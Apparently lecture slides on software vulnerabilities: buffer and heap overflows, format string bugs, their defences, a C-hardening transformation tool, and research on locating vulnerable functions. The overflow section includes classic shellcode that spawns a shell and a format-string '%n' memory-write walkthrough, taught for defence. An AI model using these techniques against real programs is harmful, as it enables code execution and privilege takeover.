Software Vulnerabilities: Definition, Classification, and Prevention

Reverse Engineering (Software Security)

4/24/2017
Overview
What are software vulnerabilities?
Types of vulnerabilities
  Buffer overflows
  Format string vulnerabilities
How to find these vulnerabilities and prevent them?
Classes of software vulnerabilities

What Are Software Vulnerabilities?
A software vulnerability is an instance of a fault in the specification, development, or configuration of software such that its execution can violate the (implicit or explicit) security policy.

Types of Software Vulnerabilities
Buffer overflows
  Smash the stack
  Overflows in setuid regions
  Heap overflows
Format string vulnerabilities

Buffer Overflows
Definition, Examples, and Defenses

What is a Buffer?
Example: a place on a form to fill in a last name, where each character has one box.
“Buffer” is used loosely to refer to any area of memory where more than one piece of data is stored.

Buffer Overflows [5]
The most common form of security vulnerability in the last 10 years
  1998: 2 out of 5 “remote to local” attacks in the Lincoln Labs Intrusion Detection Evaluation were buffer overflows.
  1998: 9 out of 13 CERT advisories involved buffer overflows.
  1999: at least 50% of CERT advisories involved buffer overflows.

How Does a Buffer Overflow Happen?
Reading or writing past the end of the buffer -> overflow
As a result, any data that is allocated near the buffer can be read and potentially modified (overwritten)
  A password flag can be modified to log in as someone else.
  A return address can be overwritten so that it jumps to arbitrary code that the attacker injected (smash the stack) -> attacker can control the host.
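
The password-flag case above can be imitated without undefined behavior. The sketch below is only a simulation under stated assumptions: the struct login layout, the field names, and both function names are hypothetical, and the copy is deliberately confined to the bytes of one struct so that the "overflow" of name into is_admin stays well defined.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical login record: a fixed-size name buffer followed by a flag. */
struct login {
    char name[8];
    int  is_admin;
};

/* Unchecked copy: writes len bytes starting at the beginning of the record,
 * the way an unbounded strcpy into name would. The length is clamped to the
 * size of the struct only to keep this simulation inside one object. */
void unchecked_fill(struct login *rec, const char *input, size_t len)
{
    if (len > sizeof *rec)
        len = sizeof *rec;
    memcpy((unsigned char *)rec, input, len);
}

/* Returns the flag value after len bytes of 'A' are copied into the record. */
int flag_after_input(size_t len)
{
    struct login rec;
    char input[sizeof rec];

    memset(&rec, 0, sizeof rec);
    memset(input, 'A', sizeof input);
    unchecked_fill(&rec, input, len);
    return rec.is_admin;
}
```

With an 8-byte input the flag stays 0; with an input as long as the whole record, the bytes that follow name land in is_admin and the flag becomes nonzero.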

Two Steps
1. Arrange for suitable code to be available in the program’s address space (buffer)
  Inject the code
  Use code that is already in the program
2. Overflow the buffer so that the program jumps to that code.

Inject the Code
Use a string as input to the program, which is then stored in a buffer.
The string contains bytes that are native CPU instructions for the attacked platform.
The buffer can be located on the stack, on the heap, or in the static data area.

Code Already in Program
Only need to parameterize the code and cause the program to jump to it.
Example: code in libc that executes “exec(arg)”, where arg is a string pointer argument. The attacker makes arg point to “/bin/sh” and then jumps to the appropriate instructions in the libc library.

Jump to Attack Code
Activation record (stack smashing attack)
Function pointer
longjmp(3) buffer

Memory Regions [4]

Code/text Segment
Static
Contains code (instructions) and read-only data
Corresponds to the text section of the executable file
An attempt to write to this region -> segmentation violation

Data Segment
Permanent data with statically known size
Both initialized and uninitialized variables
Corresponds to the data-bss sections of the executable file
The brk(2) system call can change the data segment size
Not enough available memory -> the process is blocked and rescheduled with a larger memory space

Heap
Dynamic memory allocation
malloc() in C and new in C++ -> more flexibility
More stable data storage: memory allocated in the heap remains in existence for the duration of a program
Data with unknown lifetime: global (storage class external) and static variables

Stack – I [3]
Provides a high-level abstraction
Allocates local variables when a function gets called (with known lifetime)
Passes parameters to functions
Returns values from functions
Push/pop operations (LIFO), implemented by the CPU
Size is dynamically adjusted by the kernel at runtime

Stack – II
Stack Pointer (SP): TOP of stack (or next free available address)
Fixed address: BOTTOM of stack
Logical Stack Frame (SF): contains parameters to functions, local variables, and data to recover the previous SF (e.g., the instruction pointer at the time of the function call)
Frame Pointer (FP) / local Base Pointer (BP): beginning of the Activation Record (AR), used for referencing local variables and parameters (accessed as offsets from BP)

Activation Record [5]
Contains all info local to a single invocation of a procedure
  Return address
  Arguments
  Return value
  Local variables
  Temp data
  Other control info

Accessing an Activation Record (AR)
Base pointer: beginning of AR
  Arguments are accessed as offsets from bp
Environment pointer: pointer to the most recent AR (usually a fixed offset from bp)
Stack pointer: top of AR stack
  Temporaries are allocated on top of the stack

When a Procedure is Called
Previous FP is saved
SP is copied into FP -> new FP
SP advances to reserve space for local variables
Upon procedure exit, the stack is cleaned up

Function Pointer
Find a buffer adjacent to a function pointer in the stack, heap, or static data area
Overflow the buffer to change the function pointer so that it jumps to the desired location
Example: attack against the superprobe program (Linux)

Longjmp Buffer
setjmp(buffer) to set a checkpoint
longjmp(buffer) to go back to the checkpoint
Corrupt the state of buffer so that longjmp(buffer) jumps to the attack code instead
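
For readers unfamiliar with the checkpoint mechanism itself, here is a minimal sketch of legitimate setjmp/longjmp use. The names checkpoint, fail_deep_inside, and run_with_checkpoint are hypothetical. The jmp_buf holds the saved execution context, which is why corrupting it redirects control.

```c
#include <setjmp.h>

/* Saved execution context; longjmp resumes wherever this says to resume. */
static jmp_buf checkpoint;

/* Simulates an error deep in a call chain. */
static void fail_deep_inside(void)
{
    longjmp(checkpoint, 1);   /* does not return; control resumes at setjmp */
}

/* Returns 0 if the work completed normally, 1 if we came back via longjmp. */
int run_with_checkpoint(int should_fail)
{
    if (setjmp(checkpoint) != 0)
        return 1;             /* second return from setjmp, caused by longjmp */
    if (should_fail)
        fail_deep_inside();
    return 0;
}
```

The attack described above does not call longjmp differently; it overwrites the contents of the buffer so that the restored context points at attacker-chosen code.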

Example
    void function(int a, int b, int c) {
        char buffer1[5];
        char buffer2[10];
    }

    void main() {
        function(1,2,3);
    }
Call sequence in main:
    pushl $3
    pushl $2
    pushl $1
    call function
Prologue of function:
    pushl %ebp
    movl %esp,%ebp
    subl $20,%esp

Buffer Overflow Example
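    #include <stdio.h>

    void function(int a, int b, int c) {
        char buffer1[5];
        char buffer2[10];
        int *ret;

        /* The offsets 12 and 8 depend on the compiler and platform. */
        ret = (int *)(buffer1 + 12);   /* point at the saved return address */
        (*ret) += 8;                   /* make the return skip "x = 1;" */
    }

    void main() {
        int x;

        x = 0;
        function(1,2,3);
        x = 1;
        printf("%d\n",x);
    }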

Result of Program
Output: 0
The return address has been modified and the flow of execution has been changed
All we need to do is place the code that we are trying to execute in the buffer we are overflowing, and modify the return address so it points back to the buffer

Example [6]
    #include <string.h>

    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    char large_string[128];

    void main() {
        char buffer[96];
        int i;
        long *long_ptr = (long *) large_string;   /* long_ptr takes the address of large_string */

        /* large_string is filled with 32 copies of the address of buffer */
        for (i = 0; i < 32; i++)
            *(long_ptr + i) = (long) buffer;

        /* copy the contents of shellcode into the start of large_string */
        for (i = 0; i < strlen(shellcode); i++)
            large_string[i] = shellcode[i];

        /* buffer gets the shellcode followed by pointers back to itself */
        strcpy(buffer, large_string);
    }

Example Illustrated [6]
[Figure: Process Address Space, with regions labeled argc, user stack, RA, sfp, long_ptr, i, buffer, large_string[128], shellcode[], heap, bss]

Buffer Overflows Defenses
Writing correct code (good programming practices)
Debugging tools
Non-executable buffers
Array bounds checking
Code pointer integrity checking (e.g., StackGuard)

Problems with C
Some C functions are problematic
  Static size buffers
  Do not have built-in bounds checking
While loops
  Read one character at a time from user input until end of line or end of file
  No explicit checks for overflows

Some Problematic C Functions [2]
Function                     | Severity                                 | Solution: Use
gets                         | Most Risky                               | fgets(buf, size, stdin)
strcpy, strcat               | Very Risky                               | strncpy, strncat
sprintf, vsprintf            | Very Risky                               | snprintf, vsnprintf or precision specifiers
scanf family                 | Very Risky                               | precision specifiers or do own parsing
realpath, syslog             | Very Risky (depending on implementation) | MAXPATHLEN and manual checks
getopt, getopt_long, getpass | Very Risky (depending on implementation) | Truncate string inputs to reasonable size

Good Programming Practices – I
DO NOT USE:
    void main() {
        char buf[40];
        gets(buf);
    }
Instead USE:
    fgets(buf, 40, stdin);

Good Programming Practices – II
DO NOT USE:
    void main() {
        char buf[4];
        char src[8] = "rrrrr";
        strcpy(buf, src);
    }
Instead USE:
    if (src_size >= buf_size) {
        cout << "error";
        return(1);
    } else {
        strcpy(buf, src);
    }
OR
    strncpy(buf, src, buf_size - 1);
    buf[buf_size - 1] = '\0';
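
The two alternatives above can be folded into one helper. This is a minimal sketch, not a standard library routine: copy_bounded and its return convention are assumptions made for illustration. It checks the length first, truncates when the source does not fit, and always NUL-terminates.

```c
#include <stddef.h>
#include <string.h>

/* Copies src into dst, which has room for dst_size bytes.
 * Returns 0 if src fit completely, -1 if it was truncated or dst_size is 0.
 * dst is NUL-terminated whenever dst_size > 0. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t len;

    if (dst_size == 0)
        return -1;
    len = strlen(src);
    if (len >= dst_size) {
        memcpy(dst, src, dst_size - 1);   /* keep what fits */
        dst[dst_size - 1] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);            /* includes the terminating NUL */
    return 0;
}
```

Called with the 4-byte buf and the "rrrrr" source from the slide, the helper stores "rrr" and reports truncation instead of writing past the end of buf.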

Debugging Tools
More advanced debugging tools
  Fault injection tools: inject deliberate buffer overflow faults at random to search for vulnerabilities
  Static analysis tools: detect overflows
Can only minimize the number of overflow vulnerabilities; cannot provide total assurance

Non-executable Buffers [7,8]
Make the data segment of the program’s address space non-executable -> the attacker can’t execute code injected into an input buffer (a compromise between security and compatibility)

Non-executable Buffers [7,8]
If the code is already in the program, attacks can bypass this defense method
Kernel patches (Linux and Solaris): make the stack segment non-executable and preserve most program compatibility

Array Bounds Checking
Attempts to prevent overflow of code pointers
All reads and writes to arrays need to be checked to make sure they are within bounds (check most array references)
  Compaq C compiler
  Jones & Kelly array bounds checking
  Purify memory access checking
  Type-safe languages (e.g., Java)

Code Pointer Integrity Checking
Attempts to detect that a code pointer has been corrupted before it is dereferenced
Overflows that affect program state components other than code pointers will still succeed
Offers advantages in performance, compatibility with existing code, and implementation effort
  Hand-coded stack introspection
  StackGuard -> PointGuard

StackGuard
Compiler technique that provides protection by checking the return address in the AR
When it detects an attack -> causes the app to exit, rather than yielding control to the attacker
  Terminator canary
  Random canary
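
The canary idea can be shown with a small simulation. This is not StackGuard's implementation: the struct frame layout, the CANARY value, and the function name are all assumptions chosen for illustration, and the copy is clamped to the struct so the demonstration stays well defined. The point is only that a linear overflow must cross the canary before reaching whatever follows it.

```c
#include <stddef.h>
#include <string.h>

/* Illustrative canary value (NUL, LF, 0xff, CR bytes); an assumption here. */
#define CANARY 0x000aff0dU

/* Simulated frame: a local buffer, then the canary word. In a real frame the
 * saved return address would sit beyond the canary. */
struct frame {
    char buffer[16];
    unsigned int canary;
};

/* Copies len bytes of input over the start of a fresh frame and reports
 * whether the canary survived: 1 if intact, 0 if it was overwritten. */
int canary_intact_after_copy(const char *input, size_t len)
{
    struct frame f;

    memset(&f, 0, sizeof f);
    f.canary = CANARY;
    if (len > sizeof f)
        len = sizeof f;                 /* keep the simulation in bounds */
    memcpy((unsigned char *)&f, input, len);
    return f.canary == CANARY;
}
```

A 16-byte input leaves the canary intact; anything longer changes it, which is the condition a protected program checks before returning.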

Heap Overflows
Harder to exploit, yet still common
Need to know which variables are security critical
Cause a buffer overflow to overwrite the target variables (generally the buffer needs to have a lower address)

Example
    #include <ctype.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    void main(int argc, char **argv) {
        char *super_user = (char *)malloc(sizeof(char)*9);
        char *str = (char *)malloc(sizeof(char)*4);
        char *tmp;

        super_user = super_user - 40;
        strcpy(super_user, "viega");
        if (argc > 1)
            strcpy(str, argv[1]);
        else
            strcpy(str, "xyz");
        tmp = str;
        while (tmp <= super_user + 12) {
            printf("%p: %c (0x%x)\n", (void *)tmp,
                   isprint((unsigned char)*tmp) ? *tmp : '?',
                   (unsigned int)(*tmp));
            tmp += 1;
        }
    }

Output

Output After Overflow

Format String Vulnerabilities I [9]
Caused by design misfeatures in the C standard library combined with problematic implementation (bad programming habits!)
printf family (syslog, printf, fprintf, sprintf, and snprintf): the format string tells the function the type and sequence of arguments to pop and the format for output
Hostile input can be passed directly as the format string for calls to printf functions

Format String Vulnerabilities II
Attacker can write arbitrary values to (almost any) arbitrary addresses in memory
  Overwrite a stored UID for a program that drops and elevates privileges
  Overwrite an executed command
  Overwrite a return address so it points to a buffer with shell code in it -> OWN the program

Format String – By Example fmtme.c
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(int argc, char **argv) {
        char buf[100];
        int x;

        if (argc != 2)
            exit(1);
        x = 1;
        snprintf(buf, sizeof buf, argv[1]);   /* vulnerable: user input is used as the format string */
        buf[sizeof buf - 1] = 0;
        printf("buffer (%d): %s\n", (int)strlen(buf), buf);
        printf("x is %d/%#x (@ %p)\n", x, x, (void *)&x);
        return 0;
    }

Stack Layout of Program
When the snprintf function is called:

Exploiting the Program I
Test 1:
    % ./fmtme "hello world"
    buffer (11): hello world
    x is 1/0x1

Exploiting the Program II
Test 2: print integers on the stack above the format string
    % ./fmtme "%x %x %x %x"
    buffer (15): 1 f
    x is 1/0x1
4 values of output: the variable x and three 4-byte integers taken from the uninitialized buf variable

Exploiting the Program III
Test 3: control the values stored in the buffer
    % ./fmtme "aaaa %x %x"
    buffer (15): aaaa 1 61616161
    x is 1/0x1
The 4 'a' characters we provided were copied to the start of the buffer and then interpreted by snprintf as an integer argument with the value 0x61616161 ('a' is 0x61 in ASCII)

Exploiting the Program V
Test 4:
    % ./fmtme "\x58\x74\x04\x08%d%n"
    buffer (5): X1
    x is 5/0x5

Exploiting the Program V (contd.)
snprintf copies the first 4 bytes into buf, scans the "%d" format and prints out the value of x, and then reaches the "%n" directive
It pulls the next value off the stack, which comes from the first 4 bytes of buf
These 4 bytes have just been filled with "\x58\x74\x04\x08", which read as a little-endian integer is 0x08047458
It writes the number of bytes output so far, 5, into this address
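
The byte count that "%n" stores can be observed safely with a constant format string. In this sketch the function name bytes_before_n is hypothetical and the literal "XXXX" merely stands in for the four address bytes of Test 4. Some hardened C libraries disable "%n", so this assumes a conventional implementation.

```c
#include <stdio.h>

/* Returns the number of bytes snprintf had produced when it reached %n.
 * The format string is a constant, so nothing here is attacker controlled. */
int bytes_before_n(void)
{
    char buf[100];
    int count = -1;

    /* 4 bytes from "XXXX" plus 1 byte from the integer 1, then %n stores
     * the running total into count. */
    snprintf(buf, sizeof buf, "%s%d%n", "XXXX", 1, &count);
    return count;
}
```

The stored value is 5, matching the "x is 5" result above. The difference in the attack is that the destination pointer for "%n" is taken from bytes the attacker placed in the buffer.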

Solutions
Remove the %n feature
Permit only static format strings
Count the arguments to printf
FormatGuard
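
"Permit only static format strings" is the fix that needs no tooling. A minimal sketch follows, assuming a hypothetical wrapper named format_untrusted: the untrusted text is passed as an argument to a constant "%s" format, so any directives it contains are copied as plain characters.

```c
#include <stdio.h>

/* Formats untrusted text through a constant format string.
 * Returns what snprintf returns: the length the full output would have. */
int format_untrusted(char *out, size_t out_size, const char *untrusted)
{
    return snprintf(out, out_size, "%s", untrusted);
}
```

Applied to fmtme.c, this corresponds to replacing snprintf(buf, sizeof buf, argv[1]) with snprintf(buf, sizeof buf, "%s", argv[1]).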

References
[1]
[2] Building Secure Software, Viega and McGraw
[3] Smashing the Stack for Fun and Profit, Aleph One
[4] Stony Brook State University of New York
[5] Buffer Overflows: Attacks and Defenses for the Vulnerability of the Decade
[6]
[7]
[8]
[9] Format String Attacks, Tim Newsham, Guardent, Inc. 2000

Other Useful Resources
"How to Write Buffer Overflows" by "Mudge", 1997
"Stack Smashing Vulnerabilities in the UNIX Operating System" by Nathan P. Smith, 1997
"The Tao of Windows Buffer Overflows" by "DilDog", 1998

Gemini: Using Program Transformation to Secure C Programs Against Buffer Overflows

Overview
Motivation
TXL
Transformation process
Case study results
Conclusion & future work

Motivation
Stack buffer overflows are the most common security vulnerability found in C code
The most popular , web and DNS software is open-source C code
Stack buffer overflows account for approximately 50% of security vulnerabilities since 1997

Motivation
Stack buffer overflows:
  Strings grow opposite of stack
  Return address is above strings in memory
  Overwriting a string can overwrite the return address
Prevention:
  Transforming local arrays to “pointer-to-arrays” in a way that:
    Relieves the need for programmer intervention
    Relieves the need for specific compilers
    Minimizes run-time overhead

Stack Buffer Overflows
    void func(char *str1, char *str2) {
        char buf[80];
        …
        strcpy(buf, str1);
    }
Strings grow opposite of stack
The security-critical return address is above strings in memory
Overwriting a string can overwrite the return address

In a Nutshell
Transform every array that occurs in a function to a pointer
Preserve the original semantics
  Both good and bad (where possible)
  Pointer arithmetic should still work
  Returning de-allocated memory should still work

In a Nutshell
Array -> Pointer-to-Array

TXL
Text transformation tool
Provide TXL with an EBNF grammar, a set of transformations for that grammar, and input text
Generates scanner and parser at run-time
After applying transformations, outputs the resulting text
Strongly typed
  Guarantees syntactic equivalence, but not semantic equivalence

TXL [2001 J. Cordy]

TXL example
Objective
  Replace occurrences of strcpy(s1, s2) by strncpy(s1, s2, sizeof(s1))
TXL Rule
    rule fixStrcpy Declarations [repeat compound_statement_body]
        replace $ [postfix_expression]
            strcpy '( ToBuf [unary_expression] ', FromBuf [argument_expression] ')
        where not
            Declarations [checkPointer ToBuf]
        by
            strncpy '( ToBuf ', FromBuf ', sizeof ToBuf ')
    end rule

A Parse Tree
    #include <stdio.h>
    #include <string.h>

    void main(int argc, char **argv) {
        char foo[5];
        char *ptr = strcpy(foo, argv[0]);
        printf("%s\n", ptr);
    }

TXL Transformation
Assumptions
  Globals, pointers, static and extern variables are not vulnerable to stack buffer overflows
  We will only be given compilable C code
    This is sometimes not the case with systems that use the autoconf package
Transformation Steps:
  1. Declaration expansion
  2. typedef Flattening
  3. Declaration Transformation
  4. sizeof Alias Declarations
  5. Add free and Transform return and sizeof
  6. Initialization Functions

1. Declaration expansion
Makes the transformation process easier

2. typedef Flattening
Removes type aliases
Distributes aliased array dimensions
Provides a way to differentiate statements from declarations
  C is ambiguous about declarations and statements

Declaration/Statement Ambiguity
    void main() {
        typedef char buf[5];
        buf (s);
        printf (s);
    }
This ambiguity makes some pre-processing impossible

3. Declaration Transformation
Pre-process Variable Declarations
  Adding parentheses around a declarator doesn’t change the semantics, but it does change the syntax
  Remove extraneous parentheses
  Simplifies declarations
  Groups array dimensions
Transform Arrays to Pointers
Generate Pointer Initialization

A. Pre-process Variable Declarations
Ambiguity: parsing declarations
  buf(s); and printf(s); can result in the same parse tree
Flatten typedef
Remove extraneous parentheses

B. Transform Arrays to Pointers
Transform array declarations to “pointer to array”
Create an initialization function for each array
Create temporary variables to hold the original array sizes
  In ISO C99, array sizes can be variable (an expression)

C. Generate Pointer Initialization
Replace the declaration with a pointer to an array, removing the initializer
Pointer initialization function:
  Generate a new declaration with a unique name and the same initializer
  Create a function which contains calloc and memcpy
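
A hand-written approximation of what such a transformation might produce for a local declaration like char buf[80] = "hello"; is sketched below. The names init_buf, initial, and transformed_sizeof are hypothetical, and the real tool's generated code is not shown in these slides, so treat this purely as an illustration of the calloc-plus-memcpy pattern.

```c
#include <stdlib.h>
#include <string.h>

/* Hypothetical generated initializer for: char buf[80] = "hello";
 * Returns a heap-allocated pointer-to-array, or NULL if allocation fails. */
char (*init_buf(void))[80]
{
    static const char initial[80] = "hello";   /* same initializer as the original */
    char (*p)[80] = calloc(1, sizeof *p);      /* storage moves off the stack */

    if (p != NULL)
        memcpy(*p, initial, sizeof *p);
    return p;
}

/* Sketch of a transformed function body: buf is now a pointer to an array,
 * so sizeof *buf still yields the original array size. */
size_t transformed_sizeof(void)
{
    char (*buf)[80] = init_buf();
    size_t n = sizeof *buf;    /* 80, whereas sizeof(char *) would not be */

    free(buf);                 /* inserted at the end of the scope */
    return n;
}
```

Because the storage now lives on the heap, writing past the end of the array no longer runs toward the saved return address on the stack. Using a pointer to the whole array, rather than a plain char *, is what lets sizeof keep reporting the original array size.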

4. sizeof Alias Declarations
sizeof allows for expressions, not just types
The memory assigned to a pointer is architecture dependent, but always constant
  Violates semantic preservation
Transform Arrays to Pointers: Output = 80 -> Output = 4

sizeof Alias Declarations
Generate a new declaration with the original array dimensions to replace all sizeof references

5. Add free and Transform return and sizeof
Fix return statements and insert free statements
  A return may reference a transformed array: if necessary, store the expression in a temporary variable, insert free statements for the current scope, and return the temporary variable
  3 cases:
    End of scope without a return statement
    return with an expression
    return without an expression

Add free and Transform return and sizeof
Fix return statements and insert free statements
Fix sizeof constants

6. Insert Initialization Functions
Functions are inserted at the bottom of the file, prototypes at the top
The type flattening step removes the possibility of a user-defined type occurring in a prototype before its actual declaration

Case Study Results (Most Recent)
Program | Arrays Fixed (KLoC) | Time Increase (run-time) | Regression Passed
apache  | 226 (~94)           | 11.1% (0.001s)           | N/A
bind    | 2408 (~298)         | 0.5% (2.690s)            | Yes
bison   | 56 (~21)            | 1.8% (0.458s)            |
find    | 47 (~17)            | 0% (0.000s)              |
flex    | 29 (~18)            |                          |
openssh | 513 (~56)           | 4.3% (7.233s)            |
which   | 2 (~2)              |                          |
whois   | 7 (~1)              | 32.4% (.153s)            |
All measurements are medians, not averages.

Conclusions and Future work
Limitations & future work:
  Extend the transformation algorithm for struct declarations:
    Arrays of structs (done)
    Arrays within structs (done)
Benefits:
  Current and future stack overflow attacks are guaranteed to fail when used against a transformed program

Characterizing the ‘Security Vulnerability Likelihood’ of Software Functions
Notes:
  Introduce yourself
  Software Engineering Research Group at Drexel University
  The paper, “Characterizing the ‘Security Vulnerability Likelihood’ of Software Functions”, was published at the IEEE International Conference on Software Maintenance (ICSM) this year (2003)

Talk Outline
Section I: Manager/director detail
  Why are we here?
Section II: User detail
  What can we do?
Section III: Scientist detail
  How do we do it?
Notes:
  The talk is structured differently: three sections, each providing a little more detail into the research done for the paper
  The sections are targeted towards different types of people
  Sections:
    Why our research and tools are important
    What our research and tools can do to improve the security posture of a software system
    Research details

What is a Software Security Vulnerability?
A software security vulnerability is a fault in the specification, implementation, or configuration of a software system whose execution can violate an explicit or implicit security policy.
Notes:
  An explicit security policy is one which requires design decisions (e.g., a user authentication system).
  An implicit security policy is one which does not require a design decision. An example of an implicit policy would be that a piece of software must not prevent other users from being able to use the server.

Section I
Manager level detail
Software vulnerabilities are a problem; how can we avoid them?
Notes:
  Software vulnerabilities, particularly in the buffer overflow context, are common occurrences.
  Software vulnerabilities cost industry millions of dollars every year.
  Why do they happen and how do we prevent them?

How are software security vulnerabilities avoided?
Safe programming languages
  Type safe languages
Adequate software design
  Security policies
Thorough testing
  Testing with a high percentage of code coverage
Security auditing
  Design
  Implementation
Notes:
  Safe programming languages: Type safe languages, specifically those which do dynamic checking, curtail buffer overflows, the most common vulnerability. This vulnerability will be described later. Virtual machines allow a potential DMZ which allows for monitored access to the system. Safe functions (mlock(): mlock specifies to the UNIX kernel that this memory should not be swapped to disk).
  Software design: Accurately designed security policies allow software engineers to make proper design decisions with respect to the complete system. Operating systems with process space protection. Implementations which reflect security policies.
  Thorough testing: Test cases which exercise a large amount of code are likely to reveal bugs which could turn into security vulnerabilities.
  Security auditing: Analyzing the security policies and understanding the software design at a high level allows auditors to ask critical questions about the software. Once the questions have been formulated, the code can be inspected to ensure security policies are correctly maintained and to check the code for flaws.
  Type safety: A more general definition is that no operation will be applied to a variable of a wrong type. There are additionally two flavors of type safety: static and dynamic. If you say that a program is type safe, then you are commenting on static type safety. That is, the program will not have type errors when it runs. You can also say that a language or language implementation is type safe, which is a comment on dynamic type safety. Such a language or implementation will halt before attempting any invalid operation.

Auditing for Software Security
Pre-release software development practices unlikely to change
  Safe languages
  Adequate software design
  Thorough testing
Post-release auditing typically used if warranted
Notes:
  Due to economic motivations and software development purposes, the pre-release process is unlikely to change.
  If there is reason to believe that software has security issues, a security audit may be performed.
  If we can reduce the cost and improve the efficiency of audits, developers may be more inclined to use them as preventative measures.

Security Auditing Issues
Large scale auditing infeasible due to code size
Good source code will have 1-3 bugs for every 100 lines of code [Beizer]
Security auditors need to find the software security vulnerabilities among the bugs
Security audits would benefit from a tool that identifies areas that are likely vulnerable
Notes:
  Due to the code size of large scale systems, auditing is infeasible. Therefore auditors must use their expertise to find areas which could pose a problem. If the system is poorly documented, has been maintained poorly, or has gone through a period of rapid feature development, auditing becomes a problem of reverse engineering.
  Beizer states that for every hundred lines of good code there will be 1 to 3 bugs. If a bug does not violate an explicit or implicit security policy, it is not a security vulnerability and is therefore of no concern to a security auditor.
  Locating security vulnerabilities is a task that requires a lot of manual code browsing and flow tracing.
  Security audits would benefit in cost, time, and rigor from a tool which locates those areas of code which have been shown to be statistically more vulnerable.

Improving the Security Audit
Provide a tool built on statistical measurements
Cut down the amount of code that needs to be reviewed
Ensure a high degree of accuracy
Bottom line: complexity reduction
Notes:
  Managers, why are we here? To address the problem of security vulnerabilities in code.
  This problem is going to be addressed with tools based on sound research.
  Reduce the complexity (and thus the time and expense) of security auditing.
  Manager/director: this research and these tools are aimed at improving software security by reducing the complexity of a software audit.

Section II
User level detail
How can our tools and research help the security auditor?
Notes:
  This section is geared toward a user who would use these tools during a security audit

The FLF Hypothesis
Our hypothesis is that a small percentage of functions near a source of input are more likely to contain software security vulnerabilities
These functions are known as Front Line Functions
[Figure: Input, FLF, FLF, FLF]
Notes:
  Let's review the FLF hypothesis again.
  Those functions involved with user input are suspect.
  These functions constitute a small percentage of the entire system.
  At some point, following the data provides little benefit from a security standpoint.
  We need to validate our hypothesis

Front Line Functions
60% code reduction
No auditor time required
High degree of accuracy
Notes:
  Graph of functions in OpenBSD 3.1
  Green functions represent functions with a high likelihood of vulnerability (Front Line Functions)
  A tool would simply list the suspect functions

Discovering the FLF measurement
Collect software systems with known vulnerabilities
Perform detailed static analyses of software systems
Calculate areas of likely vulnerability from information gathered during static analyses
Build tools around these calculations

How are these tools used?
Run static analysis tools on source code
A database of code facts is created
The database is used to find the likely vulnerable functions
The likely vulnerable functions are output and ranked by proximity to the input source
Notes:
  Let's do a case study to illustrate how these tools are used.
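
The slides do not say how proximity to the input source is computed. One plausible reading, used here purely as an assumption, is the breadth-first distance in the call graph from the function that reads input. The sketch below uses a small adjacency matrix as a stand-in for the code-fact database. MAX_FUNCS and distance_from_input are hypothetical names, and the FLF Density measure itself is not reproduced.

```c
#define MAX_FUNCS 8

/* calls[i][j] != 0 means function i calls function j (hypothetical facts).
 * Fills dist[] with the number of calls separating each function from
 * input_fn, or -1 if the function is not reachable from it. */
void distance_from_input(int calls[MAX_FUNCS][MAX_FUNCS], int n,
                         int input_fn, int dist[MAX_FUNCS])
{
    int queue[MAX_FUNCS];
    int head = 0, tail = 0, i;

    for (i = 0; i < n; i++)
        dist[i] = -1;
    dist[input_fn] = 0;
    queue[tail++] = input_fn;

    /* Standard breadth-first search: each function is enqueued at most once. */
    while (head < tail) {
        int f = queue[head++];
        for (i = 0; i < n; i++) {
            if (calls[f][i] && dist[i] < 0) {
                dist[i] = dist[f] + 1;
                queue[tail++] = i;
            }
        }
    }
}
```

Sorting functions by ascending distance would then give a ranking in which the functions closest to the input appear first.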

Case Study: OpenSSH
GOAL: FLF Finder identifies a large percentage of modified functions
Code that was not changed between revisions
82% of changed functions identified by FLF Finder
Notes:
  PRIVILEGE SEPARATION: Between revisions 3.1 and 3.2.3, OpenSSH went through changes that sought to separate code that needed “root” access from code that did not need “root” access
  AFTER REV.: Code that implemented privilege separation
  BEFORE REV.: These are functions that were changed during the revision
  GOAL: The FLF Finder should find a large percentage of those functions that were changed
  This means that our findings agree with the security auditors of OpenSSH on what is a likely vulnerable function
  A security auditor could use our tools and methods to find those areas of code that are statistically likely to be vulnerable.

Section III
Scientist level detail
What is the process for creating the likely vulnerable measurement?
How do we identify FLFs?

The FLF Hypothesis (revisited)
Our hypothesis is that a small percentage of functions near a source of input are more likely to contain software security vulnerabilities
These functions are known as Front Line Functions
[Figure: Input, FLF, FLF, FLF]
Notes:
  Let's review the FLF hypothesis again.
  Those functions involved with user input are suspect.
  These functions constitute a small percentage of the entire system.
  At some point, following the data provides little benefit from a security standpoint.
  We need to validate our hypothesis

Validating the FLF Hypothesis
Gather a set of vulnerable software systems (Experimental Systems).
Perform experiments on these systems with static analysis tools (GAST-MP & SGA)
  Identify all functions which initiate user input transactions (Inputs)
  Identify all functions which are vulnerable (Targets)
  Calculate FLF Density (FLF Density)
Test the FLF Density on a set of control systems (Verification)
Create a tool that utilizes the FLF Density (FLF Finder).
Notes:
  Using the scientific method, we will verify the FLF hypothesis
  Observation of software engineering patterns allowed for the formulation of the FLF hypothesis
  Predictions were made that vulnerable functions should be found close to the source of user input
  This makes sense from a software engineering standpoint because developers tend to deal with input when it arrives

Experimental Systems
30 open source systems with 31 software security vulnerabilities. Each system has a single patch file which addresses one security vulnerability. Most were recovered from Red Hat's source RPM distribution because of its incremental nature.
Single patch file: if a piece of software had a security vulnerability introduced by an off-by-one error, we tried to find the smallest patch which addressed that off-by-one error.
Single-purpose patches are hard to find: most developers have a set of other bug fixes ready to be released when a security vulnerability is found, so finding patch files that addressed only a security vulnerability was difficult.
SRPMs: Red Hat maintains a system of incremental patches, which was very useful.

Validating the FLF Hypothesis
I was the lead developer on this project, and thus these tools (GAST-MP and SGA) are the fruits of my labor.

GAST-MP & SGA
GNU Abstract Syntax Tree Manipulation Program (GAST-MP): a source code analysis tool. It operates on G++'s Abstract Syntax Tree (AST), which can be output with a -fdump-tree- flag, and creates a repository of code facts: an entity/relationship repository which can be queried.
System Graph Analyzer (SGA): operates on the code fact repository, querying it to build internal graphs. It identifies Inputs and Targets, performs invocation analysis, calculates the FLF Density, and supports analysis of categorical graphs. The graphs can then be analyzed through flow analysis.
